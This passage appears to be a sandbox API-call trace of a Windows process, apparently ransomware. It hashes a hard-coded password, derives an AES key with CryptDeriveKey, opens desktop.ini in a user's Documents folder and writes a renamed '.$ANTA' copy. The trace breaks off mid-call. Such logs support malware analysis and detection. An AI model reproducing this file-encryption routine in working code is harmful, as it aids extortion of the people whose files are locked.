1 [0083.631] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0083.631] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0083.631] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0083.631] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0083.631] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0083.631] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0083.631] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0083.631] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0083.631] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0083.631] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0083.632] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1797108, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0083.632] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0083.632] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0083.632] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContext") returned 0x0 [0083.632] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0083.632] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0083.632] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0083.632] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1796e28, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0083.632] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0083.632] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e28 | out: hHeap=0x1780000) returned 1 [0083.632] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContextA") returned 0x756ffc40 [0083.632] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0083.632] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0083.632] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391d58 | out: hHeap=0x1780000) returned 1 [0083.632] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0083.632] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0083.632] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0083.632] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0083.632] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0083.632] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0083.632] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0083.633] CryptAcquireContextA (in: phProv=0x144e7b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144e7b0*=0x41a4480) returned 1 [0083.633] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0083.633] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0083.633] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0083.633] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0083.633] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0083.633] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0083.633] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0083.633] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0083.633] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0083.633] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0083.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0083.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0083.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0083.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0083.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0083.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0083.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0083.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0083.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0083.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0083.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0083.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0083.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0083.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0083.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0083.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0083.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0083.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0083.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0083.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0083.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0083.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0083.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0083.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0083.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0083.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0083.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0083.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0083.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0083.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0083.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0083.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0083.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0083.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0083.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0083.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0083.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8ac8 | out: hHeap=0x1780000) returned 1 [0083.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0083.635] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0083.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9818 | out: hHeap=0x1780000) returned 1 [0083.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0083.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0083.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0083.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0083.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0083.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0083.635] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0083.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391b98 | out: hHeap=0x1780000) returned 1 [0083.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0083.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0083.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0083.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0083.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0083.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0083.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0083.635] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0083.635] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0083.636] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0083.636] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0083.636] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0083.711] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0083.712] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0083.712] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0083.712] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0083.712] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0083.712] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43cabf8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0083.712] CryptCreateHash (in: hProv=0x41a4480, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e520 | out: phHash=0x144e520) returned 1 [0083.712] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0083.712] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e28a8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0083.712] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0083.712] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0083.712] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2788, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0083.712] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0083.712] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0083.712] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0083.712] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43cab20, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0083.712] CryptHashData (hHash=0x41ac700, pbData=0x17e27e8, dwDataLen=0x22, dwFlags=0x1) returned 1 [0083.713] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0083.713] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0083.713] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0083.713] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0083.713] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43cacd0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0083.713] CryptDeriveKey (in: hProv=0x41a4480, Algid=0x6610, hBaseData=0x41ac700, dwFlags=0x1, phKey=0x144e520 | out: phKey=0x144e520*=0x41ac740) returned 1 [0083.713] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0083.713] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0083.713] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0083.713] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1797048, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0083.713] CryptDestroyHash (hHash=0x41ac700) returned 1 [0083.713] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\My Shapes\\desktop.ini" (normalized: "c:\\users\\fd1hvy\\documents\\my shapes\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0083.713] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.713] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ec58 | out: lpNewFilePointer=0x0) returned 1 [0083.713] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0083.714] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0083.714] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0083.714] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0083.714] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0083.714] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0083.714] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f08 [0083.714] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac040 [0083.714] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0083.714] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0083.714] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0083.714] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0083.714] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0083.714] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0083.714] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0083.714] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0083.714] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0083.714] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e08 [0083.714] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0083.714] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0083.714] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0083.714] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0083.714] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0083.714] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0083.714] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0083.714] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0083.715] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0083.715] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0083.715] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0083.715] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0083.715] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391d20 [0083.715] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0083.715] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x70) returned 0x431e310 [0083.715] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x436a0e0 [0083.715] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x4369f80 [0083.715] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0083.715] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x436a240 [0083.715] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\My Shapes\\" (normalized: "c:\\users\\fd1hvy\\documents\\my shapes")) returned 0x14 [0083.715] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac700 [0083.715] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x499a008 [0083.715] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0083.715] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0083.715] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\My Shapes\\desktop.ini.$ANTA" (normalized: "c:\\users\\fd1hvy\\documents\\my shapes\\desktop.ini.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0083.872] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0083.872] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0083.872] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0083.872] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0083.872] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0083.872] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0083.872] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0083.872] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac640 [0083.872] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0083.872] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac040 [0083.872] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0083.872] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0083.872] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0083.872] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0083.872] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0083.872] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0083.872] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0083.872] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0083.872] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797048 [0083.873] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0083.873] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0083.873] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0083.873] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x3e0d020 [0083.876] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144eca8 | out: lpNewFilePointer=0x0) returned 1 [0083.877] ReadFile (in: hFile=0x298, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ecd0, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144ecd0*=0xd8, lpOverlapped=0x0) returned 1 [0083.903] ReadFile (in: hFile=0x298, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, 